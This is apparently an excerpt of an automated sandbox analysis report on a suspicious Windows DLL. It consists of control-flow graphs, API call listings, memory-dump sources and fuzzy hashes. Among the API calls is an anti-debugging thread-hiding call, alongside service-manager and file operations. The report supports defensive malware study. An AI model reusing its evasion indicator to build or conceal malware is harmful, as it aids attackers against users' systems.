6ccc3c17-6ccc3c20 8012->8019 8020 6ccc3ce0-6ccc3cea 8012->8020 8013->7971 8021 6ccc3b49-6ccc3b50 8014->8021 8022 6ccc3b24-6ccc3b44 8014->8022 8015->8013 8045 6ccc3eea-6ccc3f04 call 6ce11470 call 6ce11480 8017->8045 8024 6ccc3afa-6ccc3aff 8018->8024 8025 6ccc3b62-6ccc3b85 8018->8025 8027 6ccc3dc5 8019->8027 8028 6ccc3c26-6ccc3c2d 8019->8028 8030 6ccc3cec-6ccc3d0c 8020->8030 8031 6ccc3d3a-6ccc3d3c 8020->8031 8021->7994 8029 6ccc3b56-6ccc3b5d 8021->8029 8022->7970 8024->8008 8025->8006 8037 6ccc3b8b 8025->8037 8034 6ccc3dc6 8027->8034 8035 6ccc3dc3 8028->8035 8036 6ccc3c33-6ccc3c3a 8028->8036 8029->7972 8038 6ccc3d90-6ccc3d95 8030->8038 8039 6ccc3d3e-6ccc3d45 8031->8039 8040 6ccc3d70-6ccc3d8d 8031->8040 8042 6ccc3dc8-6ccc3dcc 8034->8042 8035->8027 8046 6ccc3e26-6ccc3e2b 8036->8046 8047 6ccc3c40-6ccc3c5b 8036->8047 8037->7975 8043 6ccc3dba-6ccc3dc1 8038->8043 8044 6ccc3d97-6ccc3db8 8038->8044 8041 6ccc3d50-6ccc3d57 8039->8041 8040->8038 8041->8034 8042->7990 8048 6ccc3dd2 8042->8048 8043->8035 8049 6ccc3dd7-6ccc3ddc 8043->8049 8044->8027 8064 6ccc3f75-6ccc3fa1 8045->8064 8051 6ccc3c7b-6ccc3cd0 8046->8051 8052 6ccc3e31 8046->8052 8053 6ccc3e1b-6ccc3e24 8047->8053 8054 6ccc3e76-6ccc3e79 8048->8054 8055 6ccc3dde-6ccc3e17 8049->8055 8056 6ccc3e36-6ccc3e3d 8049->8056 8051->8041 8052->7978 8053->8042 8053->8054 8054->8017 8055->8053 8060 6ccc3e5c-6ccc3e5f 8056->8060 8061 6ccc3e3f-6ccc3e5a 8056->8061 8060->8051 8063 6ccc3e65-6ccc3e69 8060->8063 8061->8053 8063->8042 8063->8054 8068 6ccc4020-6ccc4026 8064->8068 8069 6ccc3fa3-6ccc3fa8 8064->8069 8072 6ccc402c-6ccc403c 8068->8072 8073 6ccc3f06-6ccc3f35 8068->8073 8070 6ccc407c-6ccc4081 8069->8070 8071 6ccc3fae-6ccc3fcf 8069->8071 8075 6ccc40aa-6ccc40ae 8070->8075 8078 6ccc4083-6ccc408a 8070->8078 8071->8075 8076 6ccc403e-6ccc4058 8072->8076 8077 6ccc40b3-6ccc40b8 8072->8077 8074 6ccc3f38-6ccc3f61 8073->8074 8079 6ccc3f64-6ccc3f67 8074->8079 8080 6ccc3f6b-6ccc3f6f 8075->8080 8081 6ccc405a-6ccc4063 8076->8081 8077->8071 8083 6ccc40be-6ccc40c9 8077->8083 8078->8074 8082 6ccc4090 8078->8082 8084 6ccc3f69 8079->8084 8080->8064 8085 6ccc4069-6ccc406c 8081->8085 8086 6ccc40f5-6ccc413f 8081->8086 8082->8045 8087 6ccc40a7 8082->8087 8083->8075 8088 6ccc40cb-6ccc40d4 8083->8088 8084->8080 8091 6ccc4144-6ccc414b 8085->8091 8092 6ccc4072-6ccc4077 8085->8092 8086->8084 8087->8075 8088->8087 8089 6ccc40d6-6ccc40f0 8088->8089 8089->8081 8091->8080 8092->8079
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: 0efd547003c209197dd08e0bc644ac1c4abd4b5df922681b3441e155f228f6a2
                                • Instruction ID: 4d880657ff52c8dbf42f78623b7d1d21cdf03fd3ba305d8a6169a92466bbddc6
                                • Opcode Fuzzy Hash: 0efd547003c209197dd08e0bc644ac1c4abd4b5df922681b3441e155f228f6a2
                                • Instruction Fuzzy Hash: C251F1716587018FC320CF29D8807D5B7B3BF92314F698A5DC0E65BA95EB74B44A8B42
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: 996b0af83de1eaf8d68ec6bba87193903955167e17d049498c8d20f9c771b230
                                • Instruction ID: 673ad0add181ed7826d90406ff278127068248c78177c06bea0ddb49a178aa37
                                • Opcode Fuzzy Hash: 996b0af83de1eaf8d68ec6bba87193903955167e17d049498c8d20f9c771b230
                                • Instruction Fuzzy Hash: EC51E171618B018FC320CF29D4807D5B7B3BF96314F698B5DC0E65BA95EB70B44A8B92
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6CCC3E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CCC3EAA
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: b5b3638eb7c07f3c6a5d65ac87e1e41bb2e7cf4a5d141612f7feca5cd75d8d9d
                                • Instruction ID: f0d38b4db4a1239afbe367aee42534d144d745e7815527abf62cdf8f754592c9
                                • Opcode Fuzzy Hash: b5b3638eb7c07f3c6a5d65ac87e1e41bb2e7cf4a5d141612f7feca5cd75d8d9d
                                • Instruction Fuzzy Hash: F0312231659B018FC720CF68C8847D6B7B3BF96314F298E5DC0E65BA81EB74740A8B52
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6CCC3E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CCC3EAA
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: 70bb9bdde31720d577d846aaa85c16dd19b21d5ad337a17e119305c1dae92d15
                                • Instruction ID: 3152d5203924c2b3e0977a8c001acaffb68453d42d544dfea1444cab8600d869
                                • Opcode Fuzzy Hash: 70bb9bdde31720d577d846aaa85c16dd19b21d5ad337a17e119305c1dae92d15
                                • Instruction Fuzzy Hash: 6031E1312147018FC724CF68C4947E6BBB2BF96308F298E5DC0E65BA85EB71B4458B52
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6CCC3E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CCC3EAA
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: 18f900d1254929d4d5fc0bd036eec52ec5a0f43a9b70fd21d5de7be6306b4d84
                                • Instruction ID: 65beb3f6ca74a5b438c43c74219d820ba000af52eb69ad8ea1e5d45834b5d9a0
                                • Opcode Fuzzy Hash: 18f900d1254929d4d5fc0bd036eec52ec5a0f43a9b70fd21d5de7be6306b4d84
                                • Instruction Fuzzy Hash: 6421F4703587018FD724CF65D8947E677B2BF52308F288E5DC0E69BA91EB74A4058B53
                                APIs
                                • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CE45130
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ManagerOpen
                                • String ID:
                                • API String ID: 1889721586-0
                                • Opcode ID: 96b558ee66d1d1aa6f8815f9c29a24129b423f635597016b34d82f4409bba71c
                                • Instruction ID: 7079432dca77157d27db9c3a891d3c27d819cff5a4b8d03ddace1e1d629082b7
                                • Opcode Fuzzy Hash: 96b558ee66d1d1aa6f8815f9c29a24129b423f635597016b34d82f4409bba71c
                                • Instruction Fuzzy Hash: 7B312AB4A09741EFC7109F28D544B0ABBF0EB8A758F60899EF888D6361C371C945DB63
                                APIs
                                • FindFirstFileA.KERNEL32(?,?), ref: 6CE3AEDC
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: 1d9f7c89bcfee6a06a3f8d9be826018b72adec11b1e2efeb92e74156b229f2ae
                                • Instruction ID: a17e0e0b273d722e221e118133b7f75d48079a80823f06b02cdd7574f8ab1f19
                                • Opcode Fuzzy Hash: 1d9f7c89bcfee6a06a3f8d9be826018b72adec11b1e2efeb92e74156b229f2ae
                                • Instruction Fuzzy Hash: 371128B45483609FDB109E68D94550E7BF4BF86318F249E59F4A8CB7A1D334DC85CB22
                                APIs
                                • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CE1ABA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                • API String ID: 2738559852-1563143607
                                • Opcode ID: 545b17e7fac2291bad674b68bdb77502d64e79e89392a51f93646fd7af6c7180
                                • Instruction ID: b77b46b40089e9d5d2f2484e5e0a153e8817f70ae85a27cfaf0d4cd8ae784fe7
                                • Opcode Fuzzy Hash: 545b17e7fac2291bad674b68bdb77502d64e79e89392a51f93646fd7af6c7180
                                • Instruction Fuzzy Hash: B4625DB064D3818FC724CF18C490A6ABBF2ABDA314F248D1EE599C7B51D734D9568B43

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 6824 6ce5cad3-6ce5cae3 6825 6ce5cae5-6ce5caf8 call 6ce4f9df call 6ce4f9cc 6824->6825 6826 6ce5cafd-6ce5caff 6824->6826 6840 6ce5ce7c 6825->6840 6828 6ce5cb05-6ce5cb0b 6826->6828 6829 6ce5ce64-6ce5ce71 call 6ce4f9df call 6ce4f9cc 6826->6829 6828->6829 6832 6ce5cb11-6ce5cb37 6828->6832 6846 6ce5ce77 call 6ce50120 6829->6846 6832->6829 6835 6ce5cb3d-6ce5cb46 6832->6835 6838 6ce5cb60-6ce5cb62 6835->6838 6839 6ce5cb48-6ce5cb5b call 6ce4f9df call 6ce4f9cc 6835->6839 6843 6ce5ce60-6ce5ce62 6838->6843 6844 6ce5cb68-6ce5cb6b 6838->6844 6839->6846 6845 6ce5ce7f-6ce5ce82 6840->6845 6843->6845 6844->6843 6848 6ce5cb71-6ce5cb75 6844->6848 6846->6840 6848->6839 6849 6ce5cb77-6ce5cb8e 6848->6849 6852 6ce5cb90-6ce5cb93 6849->6852 6853 6ce5cbdf-6ce5cbe5 6849->6853 6855 6ce5cb95-6ce5cb9e 6852->6855 6856 6ce5cba3-6ce5cba9 6852->6856 6857 6ce5cbe7-6ce5cbf1 6853->6857 6858 6ce5cbab-6ce5cbc2 call 6ce4f9df call 6ce4f9cc call 6ce50120 6853->6858 6859 6ce5cc63-6ce5cc73 6855->6859 6856->6858 6860 6ce5cbc7-6ce5cbda 6856->6860 6862 6ce5cbf3-6ce5cbf5 6857->6862 6863 6ce5cbf8-6ce5cc16 call 6ce547f5 call 6ce547bb * 2 6857->6863 6890 6ce5cd97 6858->6890 6866 6ce5cc79-6ce5cc85 6859->6866 6867 6ce5cd38-6ce5cd41 call 6ce619e5 6859->6867 6860->6859 6862->6863 6894 6ce5cc33-6ce5cc5c call 6ce5ac69 6863->6894 6895 6ce5cc18-6ce5cc2e call 6ce4f9cc call 6ce4f9df 6863->6895 6866->6867 6868 6ce5cc8b-6ce5cc8d 6866->6868 6879 6ce5cdb4 6867->6879 6880 6ce5cd43-6ce5cd55 6867->6880 6868->6867 6872 6ce5cc93-6ce5ccb7 6868->6872 6872->6867 6876 6ce5ccb9-6ce5cccf 6872->6876 6876->6867 6881 6ce5ccd1-6ce5ccd3 6876->6881 6883 6ce5cdb8-6ce5cdd0 ReadFile 6879->6883 6880->6879 6885 6ce5cd57-6ce5cd66 GetConsoleMode 6880->6885 6881->6867 6886 6ce5ccd5-6ce5ccfb 6881->6886 6888 6ce5cdd2-6ce5cdd8 6883->6888 6889 6ce5ce2c-6ce5ce37 GetLastError 6883->6889 6885->6879 6891 6ce5cd68-6ce5cd6c 6885->6891 6886->6867 6893 6ce5ccfd-6ce5cd13 6886->6893 6888->6889 6898 6ce5cdda 6888->6898 6896 6ce5ce50-6ce5ce53 6889->6896 6897 6ce5ce39-6ce5ce4b call 6ce4f9cc call 6ce4f9df 6889->6897 6892 6ce5cd9a-6ce5cda4 call 6ce547bb 6890->6892 6891->6883 6899 6ce5cd6e-6ce5cd88 ReadConsoleW 6891->6899 6892->6845 6893->6867 6903 6ce5cd15-6ce5cd17 6893->6903 6894->6859 6895->6890 6900 6ce5cd90-6ce5cd96 call 6ce4f9f2 6896->6900 6901 6ce5ce59-6ce5ce5b 6896->6901 6897->6890 6907 6ce5cddd-6ce5cdef 6898->6907 6908 6ce5cda9-6ce5cdb2 6899->6908 6909 6ce5cd8a GetLastError 6899->6909 6900->6890 6901->6892 6903->6867 6912 6ce5cd19-6ce5cd33 6903->6912 6907->6892 6916 6ce5cdf1-6ce5cdf5 6907->6916 6908->6907 6909->6900 6912->6867 6920 6ce5cdf7-6ce5ce07 call 6ce5cefe 6916->6920 6921 6ce5ce0e-6ce5ce19 6916->6921 6930 6ce5ce0a-6ce5ce0c 6920->6930 6922 6ce5ce25-6ce5ce2a call 6ce5d1b6 6921->6922 6923 6ce5ce1b call 6ce5ce83 6921->6923 6931 6ce5ce20-6ce5ce23 6922->6931 6923->6931 6930->6892 6931->6930
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 11ff63a894c2ba27df20e099ce21b9e8f58956a0e1efce4101bb45271769bc44
                                • Instruction ID: be085ec1f6f21e30909023483eabc26415be7208a12cb7e29f284d599270c9ae
                                • Opcode Fuzzy Hash: 11ff63a894c2ba27df20e099ce21b9e8f58956a0e1efce4101bb45271769bc44
                                • Instruction Fuzzy Hash: BBC1D470F04249AFDB01EF98C890BADBBB1AF4E31CFB04159E510AB781C7769956CB61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 6933 6ce6406c-6ce6409c call 6ce644ec 6936 6ce640b7-6ce640c3 call 6ce6160c 6933->6936 6937 6ce6409e-6ce640a9 call 6ce4f9df 6933->6937 6943 6ce640c5-6ce640da call 6ce4f9df call 6ce4f9cc 6936->6943 6944 6ce640dc-6ce64125 call 6ce64457 6936->6944 6942 6ce640ab-6ce640b2 call 6ce4f9cc 6937->6942 6954 6ce64391-6ce64395 6942->6954 6943->6942 6952 6ce64127-6ce64130 6944->6952 6953 6ce64192-6ce6419b GetFileType 6944->6953 6956 6ce64167-6ce6418d GetLastError call 6ce4f9f2 6952->6956 6957 6ce64132-6ce64136 6952->6957 6958 6ce641e4-6ce641e7 6953->6958 6959 6ce6419d-6ce641ce GetLastError call 6ce4f9f2 CloseHandle 6953->6959 6956->6942 6957->6956 6963 6ce64138-6ce64165 call 6ce64457 6957->6963 6961 6ce641f0-6ce641f6 6958->6961 6962 6ce641e9-6ce641ee 6958->6962 6959->6942 6970 6ce641d4-6ce641df call 6ce4f9cc 6959->6970 6966 6ce641fa-6ce64248 call 6ce617b0 6961->6966 6967 6ce641f8 6961->6967 6962->6966 6963->6953 6963->6956 6976 6ce64267-6ce6428f call 6ce64710 6966->6976 6977 6ce6424a-6ce64256 call 6ce64666 6966->6977 6967->6966 6970->6942 6982 6ce64294-6ce642d5 6976->6982 6983 6ce64291-6ce64292 6976->6983 6977->6976 6984 6ce64258 6977->6984 6986 6ce642f6-6ce64304 6982->6986 6987 6ce642d7-6ce642db 6982->6987 6985 6ce6425a-6ce64262 call 6ce5b925 6983->6985 6984->6985 6985->6954 6990 6ce6438f 6986->6990 6991 6ce6430a-6ce6430e 6986->6991 6987->6986 6989 6ce642dd-6ce642f1 6987->6989 6989->6986 6990->6954 6991->6990 6993 6ce64310-6ce64343 CloseHandle call 6ce64457 6991->6993 6996 6ce64377-6ce6438b 6993->6996 6997 6ce64345-6ce64371 GetLastError call 6ce4f9f2 call 6ce6171f 6993->6997 6996->6990 6997->6996
                                APIs
                                  • Part of subcall function 6CE64457: CreateFileW.KERNEL32(00000000,00000000,?,6CE64115,?,?,00000000,?,6CE64115,00000000,0000000C), ref: 6CE64474
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE64180
                                • __dosmaperr.LIBCMT ref: 6CE64187
                                • GetFileType.KERNEL32(00000000), ref: 6CE64193
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE6419D
                                • __dosmaperr.LIBCMT ref: 6CE641A6
                                • CloseHandle.KERNEL32(00000000), ref: 6CE641C6
                                • CloseHandle.KERNEL32(6CE5B0D0), ref: 6CE64313
                                • GetLastError.KERNEL32 ref: 6CE64345
                                • __dosmaperr.LIBCMT ref: 6CE6434C
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: 8Q
                                • API String ID: 4237864984-4022487301
                                • Opcode ID: 227509586b69a7f54bf5d54f964432796ec4b7cb7473e98bf0d829a1b8a71846
                                • Instruction ID: d6b13969c2bc22bb9e54621e4f20b70b13047f67421837adc759ffc50557f972
                                • Opcode Fuzzy Hash: 227509586b69a7f54bf5d54f964432796ec4b7cb7473e98bf0d829a1b8a71846
                                • Instruction Fuzzy Hash: 77A15932A641549FCF09DF69D8617AE7BB1EB07328F38424EE811AFB81C7358916CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7002 6ce1c1e0-6ce1c239 call 6ce46b70 7005 6ce1c260-6ce1c269 7002->7005 7006 6ce1c2b0-6ce1c2b5 7005->7006 7007 6ce1c26b-6ce1c270 7005->7007 7010 6ce1c330-6ce1c335 7006->7010 7011 6ce1c2b7-6ce1c2bc 7006->7011 7008 6ce1c2f0-6ce1c2f5 7007->7008 7009 6ce1c272-6ce1c277 7007->7009 7012 6ce1c431-6ce1c448 WriteFile 7008->7012 7013 6ce1c2fb-6ce1c300 7008->7013 7016 6ce1c372-6ce1c3df WriteFile 7009->7016 7017 6ce1c27d-6ce1c282 7009->7017 7014 6ce1c489-6ce1c4b9 call 6ce4b3a0 7010->7014 7015 6ce1c33b-6ce1c340 7010->7015 7018 6ce1c2c2-6ce1c2c7 7011->7018 7019 6ce1c407-6ce1c41b 7011->7019 7020 6ce1c452-6ce1c47f call 6ce4b920 ReadFile 7012->7020 7013->7020 7021 6ce1c306-6ce1c30b 7013->7021 7014->7005 7023 6ce1c346-6ce1c36d 7015->7023 7024 6ce1c4be-6ce1c4c3 7015->7024 7025 6ce1c3e9-6ce1c3fd WriteFile 7016->7025 7017->7025 7026 6ce1c288-6ce1c28d 7017->7026 7028 6ce1c23b-6ce1c250 7018->7028 7029 6ce1c2cd-6ce1c2d2 7018->7029 7027 6ce1c41f-6ce1c42c 7019->7027 7020->7014 7021->7005 7032 6ce1c311-6ce1c32b 7021->7032 7033 6ce1c253-6ce1c258 7023->7033 7024->7005 7035 6ce1c4c9-6ce1c4d7 7024->7035 7025->7019 7026->7005 7036 6ce1c28f-6ce1c2aa 7026->7036 7027->7005 7028->7033 7029->7005 7030 6ce1c2d4-6ce1c2e7 7029->7030 7030->7033 7032->7027 7033->7005 7036->7033
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: :uW$;uW$;uW$> 4!$> 4!
                                • API String ID: 0-4100612575
                                • Opcode ID: 620543d34c0910528ee4c94123f0be361f24d07b9d09173695434b9b732d2246
                                • Instruction ID: b6a48226bf7b7f22c91c37cc0a9f4bf206cede364753ea1731d88e0cf5a08cc3
                                • Opcode Fuzzy Hash: 620543d34c0910528ee4c94123f0be361f24d07b9d09173695434b9b732d2246
